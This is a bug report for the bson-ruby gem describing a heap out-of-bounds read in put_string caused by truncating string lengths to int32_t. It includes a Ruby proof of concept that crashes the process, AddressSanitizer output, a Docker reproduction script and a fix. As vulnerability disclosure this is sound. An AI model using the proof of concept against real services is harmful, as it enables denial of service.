[bson-ruby] Heap Buffer Overflow in put_string

XMLWordPrintableJSON

    • Type: Bug
    • Resolution: Fixed
    • Priority: Unknown
    • bson-5.2.1
    • Affects Version/s: None
    • Component/s: BSON
    • None
    • None
    • Fully Compatible
    • Ruby Drivers
    • Not Needed
    • None
    • None
    • None
    • None
    • None
    • None

      Summary

      BSON::ByteBuffer#put_string truncates Ruby string lengths to int32_t before UTF-8 validation. A string of length 2**31 wraps negative, is converted to a huge size_t, and drives the native UTF-8 validator past the end of the heap allocation.

      Affected version

      • Software: bson gem
      • Version: 5.2.0
      • Commit: dcae7f483a262305159ae8b2711cf359f7d9af65

      Details

      The native string encoder uses int32_t length to receive the result of RSTRING_LEN, even though Ruby strings can be larger than INT32_MAX.

      ext/bson/write.c:209

      static VALUE pvt_bson_encode_to_utf8(VALUE string) {
        VALUE existing_encoding_name;
        VALUE encoding;
        VALUE utf8_string;
        const char *str;
        int32_t length;
      ...
          str = RSTRING_PTR(utf8_string);
          length = RSTRING_LEN(utf8_string);
      
          rb_bson_utf8_validate(str, length, true, "String");
      

      RSTRING_LEN returns long (64-bit on modern platforms). Assigning it to int32_t silently truncates any string of 2 GB or more. A string of exactly 2**31 bytes produces INT32_MIN (-2147483648). That value is passed directly to rb_bson_utf8_validate, whose second parameter is size_t:

      ext/bson/libbson-utf8.c:105

      void
      rb_bson_utf8_validate (const char *utf8,
                             size_t utf8_len,
                             bool allow_null,
                             const char *data_type)
      {
      ...
         for (i = 0; i < utf8_len; i += seq_length) {
            _bson_utf8_get_sequence (&utf8[i], &seq_length, &first_mask);
      

      The implicit conversion of a negative int32_t to size_t wraps to a value near UINT64_MAX. The loop then iterates far past the end of the string, and the first byte read in _bson_utf8_get_sequence is performed out of bounds:

      ext/bson/libbson-utf8.c:40

         unsigned char c = *(const unsigned char *) utf8;
      

      Proof of concept

      require "bson"
      
      buffer = BSON::ByteBuffer.new
      huge = "A" * (2**31)
      warn huge.bytesize
      buffer.put_string(huge)
      

      AddressSanitizer output

      ==859==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff75bfe801
      READ of size 1 at 0xffff75bfe801 thread T0
          #0 0xffff97dafa5c in _bson_utf8_get_sequence /tmp/src/ext/bson/libbson-utf8.c:40
          #1 0xffff97dafc78 in rb_bson_utf8_validate /tmp/src/ext/bson/libbson-utf8.c:121
          #2 0xffff97db71b8 in pvt_bson_encode_to_utf8 /tmp/src/ext/bson/write.c:226
          #3 0xffff97db73c8 in rb_bson_byte_buffer_put_string /tmp/src/ext/bson/write.c:243
      
      0xffff75bfe801 is located 0 bytes to the right of 2147483649-byte region
      SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/src/ext/bson/libbson-utf8.c:40
               in _bson_utf8_get_sequence
      

      Reproduction

      On a machine with Docker, run:

      mkdir -p dfvuln-772-bson-put-string-oob
      cd dfvuln-772-bson-put-string-oob
      cat > poc_put_string_oob.rb <<'RUBY'
      require "bson"
      
      buffer = BSON::ByteBuffer.new
      huge = "A" * (2**31)
      warn huge.bytesize
      buffer.put_string(huge)
      RUBY
      
      docker run --rm -v "$PWD":/work -w /work ruby:3.3-bookworm bash -lc '
      set -eux
      apt-get update -qq
      apt-get install -y -qq git build-essential pkg-config >/dev/null
      git clone --depth=1 https://github.com/mongodb/bson-ruby.git src
      cd src
      git rev-parse HEAD | tee /work/commit.txt
      bundle config set path vendor/bundle
      bundle install
      cd ext/bson
      make distclean >/dev/null 2>&1 || true
      ruby extconf.rb --with-cflags="-O0 -g -fsanitize=address -fno-omit-frame-pointer" \
                      --with-ldflags="-fsanitize=address"
      make -j"$(nproc)"
      cd ../..
      cp ext/bson/bson_native.so lib/
      ASAN_LIB=$(gcc -print-file-name=libasan.so)
      set +e
      LD_PRELOAD="$ASAN_LIB" \
        ASAN_OPTIONS="detect_leaks=0:abort_on_error=0:symbolize=1" \
        ruby -Ilib /work/poc_put_string_oob.rb 2>&1 | tee /work/asan.log
      status=${PIPESTATUS[0]}
      set -e
      test "$status" -ne 0
      grep -q "ERROR: AddressSanitizer: heap-buffer-overflow" /work/asan.log
      '
      

      This builds bson_native.so with ASan inside Docker, runs the PoC, and writes the raw sanitizer output to asan.log.

      Independent confirmation

      The report was reviewed against the current source tree at commit dcae7f483a262305159ae8b2711cf359f7d9af65. The defect is confirmed.

      ext/bson/write.c contains two sites where RSTRING_LEN is assigned to int32_t: lines 214 and 241 (inside pvt_bson_encode_to_utf8 and rb_bson_byte_buffer_put_string respectively). On a 64-bit host, RSTRING_LEN returns long. The truncation is silent – no compiler warning, no runtime check. Passing the resulting negative value to rb_bson_utf8_validate (which takes size_t) is the direct cause of the out-of-bounds read described above.

      Severity assessment

      Low to Medium. The crash is real and reproducible as described. Practical exploitability is constrained by the requirement to allocate and pass a string of at least 2 GB. MongoDB drivers enforce a 16 MB per-document limit at a higher layer, so this path is unreachable in standard MongoDB usage. In contexts where the bson gem is used directly and no upstream size limit is enforced, an attacker who can supply a large enough string could crash the process. The impact is a heap out-of-bounds read, not a write; reliable code execution is not a plausible outcome on hardened platforms.

      Suggested fix

      In both pvt_bson_encode_to_utf8 and rb_bson_byte_buffer_put_string, change the length variable from int32_t to long (matching RSTRING_LEN's return type). Add an explicit bounds check before calling rb_bson_utf8_validate and before writing the 4-byte length prefix (BSON string length is encoded as int32_t, so strings longer than INT32_MAX bytes are invalid BSON regardless):

      long length = RSTRING_LEN(utf8_string);
      if (length > INT32_MAX) {
          rb_raise(rb_eArgError, "String length %ld exceeds BSON maximum", length);
      }
      

            Assignee:
            Jamis Buck
            Reporter:
            Jamis Buck
            Votes:
            0 Vote for this issue
            Watchers:
            1 Start watching this issue

              Created:
              Updated:
              Resolved: